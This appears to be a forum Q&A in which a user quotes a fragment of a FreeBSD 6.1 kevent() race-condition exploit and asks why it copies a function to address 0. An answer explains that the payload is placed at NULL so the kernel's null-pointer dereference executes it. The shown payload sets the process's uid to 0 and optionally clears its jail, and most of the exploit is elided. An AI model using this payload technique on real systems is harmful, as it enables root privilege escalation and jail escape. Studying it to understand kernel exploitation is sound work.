I'm reading a piece of code about exploit in here. There is a statement going like this:
/*
FreeBSD <= 6.1 suffers from classical check/use race condition on SMP
systems in kevent() syscall, leading to kernel mode NULL pointer
dereference. It can be triggered by spawning two threads:
1st thread looping on open() and close() syscalls, and the 2nd thread
looping on kevent(), trying to add possibly invalid filedescriptor.
*/
static void kernel_code(void) {
struct thread *thread;
gotroot = 1;
asm(
"movl %%fs:0, %0"
: "=r"(thread)
);
thread->td_proc->p_ucred->cr_uid = 0;
#ifdef PRISON_BREAK
thread->td_proc->p_ucred->cr_prison = NULL;
#endif
return;
}
static void code_end(void) {
return;
}
int main() {
....
memcpy(0, &kernel_code, &code_end - &kernel_code);
....
}
I'm curious what's the meaning of this memcpy? What is the result of &code_end - &kernel_code?
This assumes that the function kernel_code() will end where somewhere before function code_end() starts. The memcpy() therefore copies kernel_code() to address 0. One assumes that some other aspect of the exploit results in a return or jump to address 0, thereby running kernel_code().